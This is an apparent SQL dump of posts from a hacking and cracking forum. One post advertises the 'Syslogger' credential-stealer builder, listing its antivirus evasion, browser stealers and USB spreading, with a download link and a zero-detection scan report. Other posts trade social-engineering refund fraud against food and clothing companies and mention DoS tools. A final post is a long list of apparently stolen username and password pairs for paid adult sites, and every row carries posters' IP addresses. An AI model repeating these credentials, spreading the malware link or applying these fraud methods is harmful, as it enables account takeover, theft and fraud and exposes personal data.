`replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1587', '337', '0', '15', '[HOT] Syslogger LATEST VERSION [HOT]', '2', '171', 'W33D', '1346806276', '[align=center][img]http://1.bp.blogspot.com/-qhRwyJiktiw/T_h-xrp4_8I/AAAAAAAAAa8/3tFEygx5hSQ/s400/kbAp6.png[/img] [img]http://i.imgur.com/zz5G9.png[/img] Antis [x] AntiAnubis [x] AntiBitdefender [x] AntiKaspersky [x] AntiMalwarebytes [x] AntiNod32 [x] AntiNorman [x] AntiOllydbg [x] AntiOutpost [x] AntiWireshark Stealers [x] Google Chrome (latest version) [x] Mozilla Firefox (latest version) [x] Opera (version 10) [x] Windows Live Messenger (latest version) Features [x] Antis [x] Mail Encryption [x] Stealers [x] Cookie Deletion [x] Download Link Encryption [x] AV Site Blocker [x] USB Spread [x] Startup [x] Taskmanager Killer [x] Clipboard Logger [x] Steam Forcer [x] Downloader [x] Fake Error [x] Melt [x] Screen Logger [x] Mutex [x] Infection Notify [x] Native Stub and a couple more [lock]download link: http://www.mediafire.com/?0ssc2q0341f6qlq[/lock] virus scan: http://vscan.novirusthanks.org/analysis/3eef2a893027283f05d31771a8e48ba4/c3lzbG9nZ2VyLWJ1aWxkZXItZXhl/ results: [i]File Info[/i] Report date: 2012-09-05 02:31:49 (GMT 1) File name: [b]syslogger-builder-exe[/b] File size: 450048 bytes MD5 Hash: 3eef2a893027283f05d31771a8e48ba4 SHA1 Hash: 64d2098fd4205f32974d49545f46c3cd454e0112 Detection rate: 0 on 14 (0%) Status: [color=green]CLEAN[/color] [i]Detections[/i] Asquared - [color=red][/color] Avast - [color=red][/color] AVG - [color=red][/color] Avira - [color=red][/color] BitDefender - [color=red][/color] ClamAV - [color=red][/color] Comodo - [color=red][/color] DrWeb - [color=red][/color] Fprot - [color=red][/color] IkarusT3 - [color=red][/color] Panda - [color=red][/color] STOPZilla - [color=red][/color] TrendMicro - [color=red][/color] VBA32 - [color=red][/color] [i]Scan report generated by [url=http://novirusthanks.org]NoVirusThanks.org[/url][/i] enjoy guys :)[/align]', '67.68.224.95', '1128587359', '1', '0', '1', '1352012108', '1', 'ccb0dd2b65ca15275429bd5d578c5167', '0', '1352012108'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1588', '318', '1585', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '82', 'iTzIpod', '1346806998', '[quote=\'2112\' pid=\'1585\' dateline=\'1346801717\'] [quote=\'iTzIpod\' pid=\'1584\' dateline=\'1346801505\'] How do I exchange it? I can\'t seem to figure it out :/ [/quote] Find a trusted exchanger. Such as anyone from Hf, there\'s a currency forum, and people are allowed to exchange their paypaI for Liberty Reserve. [/quote] Well\' I\'m IP banned from HF... :/ Which totally sucks. Even try searching iTzIpod on HF. I\'m exhiled. But probably that method would help out Sirchamp.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c716e9273aeb3ece1deb433add0b4502', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1589', '336', '1586', '7', 'RE: Hope my work pays off', '0', '61', 'NXK', '1346811412', 'Good job man. Glad to see how much you\'re doing. I should probably step it up tomorrow after classes and get some advertising done also.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '107e419e7a3dfa13f56d8f878b9d6ce4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1590', '336', '1586', '7', 'RE: Hope my work pays off', '0', '1', 't3h jok3r', '1346812877', 'If you are talking about the 23 guests then those are not real guests, they are spiders/crawlers (AKA Bots) Thanks though for advertising LH.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3b4a617d393ed00fdbf87c9ac01f7bea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1591', '252', '1089', '54', 'RE: August 27, 2012 XXXX Accounts', '0', '1', 't3h jok3r', '1346812916', 'These logins are not just posted on LH but many other sites as well that\'s why many logins get expired too quickly.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '482d833ec15f8c4d5f0c45b44cb10ef9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1592', '323', '1582', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346812975', '[quote=\'iTzIpod\' pid=\'1582\' dateline=\'1346801158\'] [quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\'] I can understand, we have some cool updates coming up for LH. [/quote] Mind PMing me some info or spoilers? [/quote] Nope, it spoils the fun.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '1e48e74fab00cd73e545a5a5d16f4895', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1593', '293', '1363', '16', 'RE: How to SE fererro', '0', '112', '??????Z', '1346814019', 'Thanks Fap. just had a go. will update you all on my progress to see if i get any goodies :) [hr] It worked! and fast... Dear Samuel, Thank you for your email regarding a box of Ferrero Rocher which you found to be out of condition. It is most disappointing to hear that you were unable to experience Ferrero’s usual high standards. It is probably likely that somewhere along the line since leaving the factory the product has been exposed to a source of heat during storage and has therefore deteriorated. As a gesture of goodwill I will arrange for a replacement box to be sent to the below address, with my compliments.', '92.22.251.182', '1545010102', '0', '0', '112', '1346863685', '1', '55b4efe2f5c5796374928d3f98faacb7', '0', '1346863685'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1594', '294', '1364', '16', 'RE: How to se pringles,monster,hersheys,duracell and stride', '0', '112', '??????Z', '1346814080', 'Thanks, just tried monster and duracell. will update you all on my progress.', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', 'aaaf87c9fb149d67ee877344dfee1dc0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1595', '54', '138', '16', 'RE: [tut]How to SE McDonald', '0', '112', '??????Z', '1346814659', 'couldnt use the .com one in england so i went to .co.uk to test it out. my story was i took my girlfriend and a few of her mates for a birthday treat and the food quality was terrible + staff were rude and declined a refund. will update on how it goes.', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', 'c639b04270c486eba782aa9bc40076fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1596', '336', '1586', '7', 'RE: Hope my work pays off', '0', '2', 'Apathy', '1346815400', 'How did you make 17$? And thanks for advertising.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', '80813f615a216ff93025314a037c1ebc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1597', '338', '0', '4', 'Hola', '0', '112', '??????Z', '1346815667', 'Hello my name is Sam, nickname kennerz. ive been on these forums a few weeks now but only just noticed the introduction section. anyway just want to say hi to the community and hope to have a good time here. bit about me- SE N00B Hacking N00B everyones gotta start somewhere though, right?', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '62264829e64c4ddfb82d303434d2d86b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1598', '338', '1597', '4', 'RE: Hola', '0', '166', '2112', '1346815788', 'Well hello, I guess I can\'t say welcome because you\'ve been here for awhile.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'd3a363a427d4950f0af6ac1072aa8b0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1599', '338', '1598', '4', 'RE: Hola', '0', '112', '??????Z', '1346815925', '[quote=\'2112\' pid=\'1598\' dateline=\'1346815788\'] Well hello, I guess I can\'t say welcome because you\'ve been here for awhile. [/quote] Well then welcome to you. hehe :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', 'c109b743669d313f5e39e129c3f9b41c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1600', '338', '1597', '4', 'RE: Hola', '0', '1', 't3h jok3r', '1346822222', 'Late welcome ;) Lol so how do you find LH?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '93082ff3d511608fefbce5b05d2c1189', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1601', '339', '0', '55', '[Req]Torrentleech invite', '0', '62', 'R?????zo?', '1346837105', 'Been looking for this for ages, someone got a spare one? I would love you, thanks in advance.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '40864031aeac1f7e07cb515af7b0a2c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1603', '338', '1600', '4', 'RE: Hola', '0', '112', '??????Z', '1346841092', '[quote=\'t3h jok3r\' pid=\'1600\' dateline=\'1346822222\'] Late welcome ;) Lol so how do you find LH? [/quote] so far i find it pretty cool. some nice tutorials and so far decent members. hopefully all stays good and this community will grown and become great :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '6321b8b10957c4a49b7a2849db4f5c35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1604', '340', '0', '16', 'Free Nike\'s SE', '0', '112', '??????Z', '1346841602', 'i was sent this E-book/Tutorial by a friend it is to get a free pair of Nike\'s of your choice, i personally haven\'t tried it out because it can be used in America only and i am British. The method is done by Phone call . No credit goes to me for the method. if you want a copy then just send me a pm. if anyone takes a copy please let me know how you get on :)', '92.22.251.182', '1545010102', '0', '0', '112', '1346841661', '1', '4b153e917ed9c0cca7b54cb87d763b63', '0', '1346841661'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1605', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1346857255', 'Good luck with taking down facebook or wathever huge site you tried..', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '05c2ccd738410bc122e5721b352b494a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1606', '302', '1405', '53', 'RE: Java DoS Script', '0', '67', 'HoverCatz', '1346860146', 'Not at all :|', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '8a9b544aafc77ef565607d3efa1e1c07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1607', '340', '1604', '16', 'RE: Free Nike\'s SE', '0', '1', 't3h jok3r', '1346860811', 'LH is a small website and not everyone has made it to 10 posts in order to start sending private messages. I would recommend post here then OP sends the PM.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '52d705943fb891d15b8cf43926d1979e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1608', '340', '1604', '16', 'RE: Free Nike\'s SE', '0', '82', 'iTzIpod', '1346874887', 'Can you PM me it? I got a lot of things to do.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e483f10cda78de950a87bf6a33bbf271', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1609', '338', '1597', '4', 'RE: Hola', '0', '82', 'iTzIpod', '1346874943', 'Welcome! :3 Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '965c8ecee685e905077df5021ab8f93c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1610', '338', '1597', '4', 'RE: Hola', '0', '2', 'Apathy', '1346875125', 'Welcome to the forum. Try to be active and enjoy your stay.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', 'f6e288e64e38bc456f86a1c78b2fc4b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1611', '323', '1592', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346875256', '[quote=\'t3h jok3r\' pid=\'1592\' dateline=\'1346812975\'] [quote=\'iTzIpod\' pid=\'1582\' dateline=\'1346801158\'] [quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\'] I can understand, we have some cool updates coming up for LH. [/quote] Mind PMing me some info or spoilers? [/quote] Nope, it spoils the fun. [/quote] Waiting is not really fun :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '289d89e501eea75902fc753df0d4b4b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1612', '336', '1590', '7', 'RE: Hope my work pays off', '0', '82', 'iTzIpod', '1346875327', '[quote=\'t3h jok3r\' pid=\'1590\' dateline=\'1346812877\'] If you are talking about the 23 guests then those are not real guests, they are spiders/crawlers (AKA Bots) Thanks though for advertising LH. [/quote] Oh.. :/ But I did refer a friend of mine yesterday! :D @Apathy, can\'t say.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4227537a57de8739af0ed2b56e4f1461', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1613', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1346875369', 'Alright good luck @Jacob', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '92a51db0728aa6b65a7385cbcb3d0247', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1614', '341', '0', '54', 'Porn passes (big list)', '0', '62', 'R?????zo?', '1346878986', 'http://www.videosz.com/login.php bevila12:a083142 whaley334:tyebaby1 dalelin:muskeg http://members.naughtyamerica.com/ retep56:timoon xxyyzz123:cooly123 geoffroy:brutus Raymond2222:3440172 retterer:tbmjtb78 http://members.vivid.com/login/ david1968:2112rush ddomin1:turningin2 http://members.wickedpictures.com/access/login clipper657olorlpc Lyding:nineinch9 abcde789:lalakers http://members.pornpros.com/splash.php braulio2610:dukesa1991 deathnova:2x77913 tck1982:To123456789 http://www.exploitedbabysitters.com/...show.php?a=2_1 plan2000:127393 oddbjorn:dodgeram http://parodypass.com/members/ TC2020:colclf33 rattek:334W6KN7 http://shyangela.com/members/ bnbrand:mumbels08 http://members.twistyshard.com/ stogie:k9sextoy http://members.janessabrazil.com/ adammoll:kurtz1 l@mb3rt:w1nn3r dmarty12assword Amateurindex:ryan123 venomr6:ranger hduerson:mvagusta jp2525:bluntman longnthk:016093 yuan1128:frank112 happy01:monkey12 http://members.18xgirls.com/sblogin/login.shtml/ a190905:alanca55 a123987as:asdf1293 aaaassss:ssssaaaa A585556:gestisa aaccee88:kk00ooii aaronl:93fordf150 aaronhomolka69:gordo24 aaronfreshy:Arsenal4ever http://exclusive.premiumpass.com/Login/login/ pc9e5z4kh19n9gqi:lustsex PooStamp:072603mla pc2x9rk3nqhvmowk:sparky23 lcc1955:modena pcb4b1ofsz92q2ma:t500913f pcseqdn9euy94ydy:jake1400 deevoo:amanda15 pclzjspn5qbze9yg:Klapaucius23 avasta19:ant51979 http://members.pornstarplatinum.com/ kev5866oker12k MUe3gw:4cwr2z robg455:muffngus rettem88:cheddar8 lalibco:1913Diaz pvUasM:VDs8Zi bcLQx5:wdXvpn nick19:alderaan jeffcbbe:abington boeu6H:Fai4Gu techmal:bond007 http://members.ericacampbell.com/show.php?a=15_1 raz:changeme 1Lgray:1Tigress richmedia:changeme http://members.allofgfs.com/login.php? 8rUwQqUU:Xf8WTb8X neopremium:neopassword tatarinad:gkjiou5ijZgKLUH passwordhere:26u7i8ottkh tatarin:FG5423WE alexlog717:alexpass joshpoole77:andynngray arsen2:arsen1 irinasp:Hsdkj-irinasp RT567JUFR56LO http://www.simonscans.com/members/updates/ plamf67:Schatzi http://straight.theater.aebn.net/ kriging123:carolina123 jaydownie:jl4384 http://members.unlimitedmilfs.com/ slysheep:a7fhmm9o Kaminaree:kami1180 http://hdsex18.com/members/scenes.html ouchana:smly2286 ferandresh:mierda jestchamp:stalcup charles941:damdog2 http://www.youngharlotsacademy.com/members/ adrianbayer:rosarotebrille coralprincess1:voyager1 http://members.hegre-art.com/ tichka7:cbx1000 http://members.allofgfs.com/login.php? 8rUwQqUU:Xf8WTb8X neopremium:neopassword tatarinad:gkjiou5ijZgKLUH passwordhere:26u7i8ottkh tatarin:FG5423WE http://www.private.com/members/index.php Dek333:Catering321 exitchatassword http://members.stunners.com keikei:wg8e3wjf pathfinder:m4a1556mil rmayo70amita01 sherry_rIxuQ:h3wkeijr stvn:Aimee08 http://members.allgravure.com/multilogin/ chmonkey2007:monkey1989 http://www.sexeurocup.com/members/ chunkwedge:catboy marty005adds005 esoj1957:jlg0919 http://pornking.membercms.com/ maxoka:yulihaz http://members.euro-angels.com carmela:borty77 mazqq12:joll000s http://www.nakednews.com/cgi-bin/members/ ejypeguve1009:amidypina ezavygajy1009:ivinabidy http://www.dirtyukwives.com/members_awiz/ saz5695:england1 bertlookin:bert1971 http://www.modelstits.com/members/index.php?PSSO frigo123:frigo321 bambino:tottenha mnr333:m3m9nu http://m-u-s-e.org/members/index.php brigham:divine dwayne:beautyma museadmin:enterpri http://www.cfnm-plus.com/membersarea/ Jimbore:12345679 Xeno100xxx12 http://members.pornofanclub.com/members/home.phtml goingcrazy_2:123456 wabashs:wabashs manitoultd:VasPahEt http://www.crazybabe.com/members/ 6541036:taneka vegasken:thebestporn edward:robert http://members.allelitepass.com/ mathewparsa:meddy21 22hornybert:turkey101 breeze0:airforce http://www.lesbian-strapons.com/membersarea/movies.html attila:totila elite1:elite2 http://www.bustyclassics.com/members/ gbc031:bee3167 raitius:zard5411 hunchon:rjod7955 kavzheng:283888 vincentiepper masterxxx:chiodino http://members.18ager.com/show.php?op=video chustapiapeap65:slethusl jaisanoufraic32:bupiakea thafriauuwrea21:wuduhout http://vip.pornaccess.com collp0zs:bazzartz carm00x:maxzza11 http://www.sammy4u.com/members/index.php?nats= kk7426:vision1 jaimechojun:111180914 wrench1:snapon http://cadillac94:deville@members.ab...ians.com/full/ http://cmaloney:gruff1@members.absoluteasians.com/full/ http://babygreen:surreygi@members.victoriasummers.com/ http://istari84:radagast@members.victoriasummers.com/ http://eatmenow:02587410@lesbiannina...mbers/english/ http://fractales:cazador@lesbiannina...mbers/english/ http://edhull:nathan@members.18teenlive.com/full/ http://siadewalk:surfer@members.18teenlive.com/full/ http://ShannonBrooke:Boyfrien@altexc...om/membersALT/ http://masternm11:tascam11@altexclusive.com/membersALT/ http://lauradore:sweetiec@altexclusive.com/membersALT/ http://Luggi01:Corratec@members.louisamay.com http://RITAGE:T105RTO@members.louisamay.com http://keepitgully:wetwild@www.vipusers.com/access/ http://caper65:sydney123@vipusers.com/access/ http://brikhaus:salome@vipusers.com/access/ http://interwoo:1f0dase@bikini-heat.com/area51/ http://pppppppp:gggggggg@bikini-heat.com/area51/ http://rosabora:livevw03@bikini-heat.com/area51/ http://costina:verdino@www.sexyjaqui.com/members http://werwer:sdfsdf@www.sexyjaqui.com/members http://hanhtest:hanhtest1@www.sexyjaqui.com/members http://rdQDw7Iy:JgGLmzOrSAx42urm@www...ui.com/members http://sam:sam@www.sexyjaqui.com/members http://maximim:gibson@www.sexyjaqui.com/members http://msteves:cr9112@www.sexyjaqui.com/members http://Darkman0:18419820@www.sexyjaqui.com/members http://fripou:tomuch@www.sexyjaqui.com/members http://epoch11:epoch12@www.prepartyn...sh/?tab=videos http://fripou:tomuch@www.prepartynig...sh/?tab=videos http://COLCHONOLIGON@www.prepartyn...sh/?tab=videos http://alecounet:911911@forcedmen.com/members http://construction:goodbuild@forcedmen.com/members http://duncan:custer@www.annekexposed.com/members/ http://trancer:maingun@www.annekexposed.com/members/ http://quisto69:summer69@www.annekexposed.com/members/ http://Valheese:dontknow@in.lifetime...bers/index.php http://pcsykes:bermuda@in.lifetimean...bers/index.php http://punk2377:rancid99@in.lifetime...bers/index.php http://elicko82:a159635741@in.lifeti...bers/index.php http://dmaye999:glenties@in.lifetime...bers/index.php http://rodrigsd:rico@www.amateurbrazil.com/mem http://sk:sk17@www.amateurbrazil.com/mem http://craigg:western@www.wetmembers...awiz/index.php http://tbtcomp:tigatha@www.wetmember...awiz/index.php http://81718171:13251325@www.wetmemb...awiz/index.php http://zigggy:112711@www.wetmembers....awiz/index.php http://charles:sabado@www.wetmembers...awiz/index.php http://beeper:bball10@www.wetmembers...awiz/index.php http://salazar:michael@www.wetmember...awiz/index.php http://RRINMAS:randy2@www.wetmembers...awiz/index.php http://monkey:monkey10@members.easyt...com/index2.php http://shiser1207:****79@members.eas...com/index2.php http://theloniousmonkey:dabulls@memb...com/index2.php http://darlene:bromestead@members.ea...com/index2.php http://treleigh:3leigh@members.easyt...com/index2.php http://ruffyo11:ruffyo11@www.deviantdavid.com/members/ http://olymprun1:ravens1@www.deviantdavid.com/members/ http://sluggo_69rQg:191919@www.devia...d.com/members/ http://sockings:maniac@www.deviantdavid.com/members/ http://bigj:joperron@members.hisfirs...some.com/full/ http://hugo:morgan@members.hisfirstthreesome.com/full/ http://gepY4CsJ:JCzK7BsW@members.momsonfilm.com/ http://cropabethaeve36:kiotrucl@members.momsonfilm.com/ http://talioslosiadr50:cheatruh@members.momsonfilm.com/ http://exocet:plaudit@spankmemories....min/home_m.htm http://chase0509:Lincoln0@spankmemor...min/home_m.htm http://Frankboy1943:Wetzlar@spankmem...min/home_m.htm http://spankeepants:pregnant@spankme...min/home_m.htm http://alexlouisa:steve121@members.ilovebitties.com/ http://RITAGE:T105RTO@members.ilovebitties.com/ http://and11e:caesaron@members.ilovebitties.com/ http://bb6666:wank123@members.ilovebitties.com/ http://graemeg1:gafoorg1@members.ilovebitties.com/ http://edgell12:scratch@members.ilovebitties.com/ http://joyboy78:monkey@members.ilovebitties.com/ http://elonexenole@members.ilovebitties.com/ http://kruger76:danath76@members.ilovebitties.com/ http://ANDY515:GERSFC@kianabound.com/members http://Slover20:t112987@kianabound.com/members http://1948ford:chimway@kianabound.com/members http://Darkman1:ball101@kianabound.com/members http://123456:654321@nextdoornancy.com/members/ http://dexter25rinting@nextdoornancy.com/members/ http://waldo4ever:95505369@members.p...eo.com/secure/ http://downtime:axion1@members.playt...eo.com/secure/ http://johnjmk:jmk2jmk@members.playt...eo.com/secure/ http://mustang5:ayacdc@members.playt...eo.com/secure/ http://pahose:pantyhos@members.playt...eo.com/secure/ http://madgreek1:madness1@chestermolester.com/members/ http://david69faber:led69zep@chester...r.com/members/ http://D4tXRhja:vTBSrV32@www.loriple...bers/index.php http://hardcore:likehard@www.loriple...bers/index.php http://Biser56:washere@www.loripleas...bers/index.php http://awgdnw:dirsh12@www.loripleasu...bers/index.php http://bigoaks:celtic@www.realitymem...angmywhiteass/ http://lowlowlow:hithithit@www.reali...angmywhiteass/ http://skull1:skull2@www.realitymemb.../milfexplorer/ http://leeboi2:razor@www.realitymemb...angmywhiteass/ http://JACKWC:WTONY@www.realitymembe...vegassexparty/ http://bokum03:kool1234@members.cuma...com/index2.php http://espesko:musikk@members.cumacademy.com/index2.php http://corrn321:cloud321@members.cum...com/index2.php http://brunel:stalker@www.stilettofo...ure/index.html http://glodwyn:tjl1982@www.stilettof...ure/index.html http://mamanda:reactive@www.stiletto...ure/index.html http://footlove:leyton@www.stilettof...ure/index.html http://888888:kgbkgb@www.stilettofoo...ure/index.html http://22eagle:dustin22@blackbachelo...al/index1.html http://sdjk80:gh9Kaos@blackbachelor....al/index1.html http://crazylovinkid:lookout1@member...com/index2.php http://glenn74:shazzaroo34@members.n...com/index2.php http://munx658:744825@members.nasty19.com/index2.php http://nfcp3jxvs0409:3rcgnjmhj@membe...com/index2.php http://08ymm0svn0509:nua8bq5r8@membe...com/index2.php http://Missionzero:assassin@members....s.com/members/ http://joeb2009:olympia9@members.pri...s.com/members/ http://golfman2323:theman23@members....s.com/members/ http://liunian:cndl300@members.priva...s.com/members/ http://sunhyeun:2825es@members.priva...s.com/members/ http://jromans13:marine1@members.pri...s.com/members/ http://hanhtest:hanhtest1@www.lesbiannina.com/members http://vlPCDIT9MPIrauIEzj8tTqe@www...na.com/members http://nicpaycom:nictest2@www.lesbiannina.com/members http://saliks:salicas@www.lesbiannina.com/members http://MARLEIN:MARJORIE@lsgmodels.co...ed/members.php http://Martinb:Belgrano@lsgmodels.co...ed/members.php http://RKG755:Ricardo@lsgmodels.com/...ed/members.php http://HEINRICH:maxima@lsgmodels.com...ed/members.php http://t_okitsu:±2505har@lsgmodels.c...ed/members.php http://dawghair:sexphoto@lsgmodels.c...ed/members.php http://gxv3742401:gxv3742401@members.overallpass.com http://igaiga1:igaiga1@members.overallpass.com 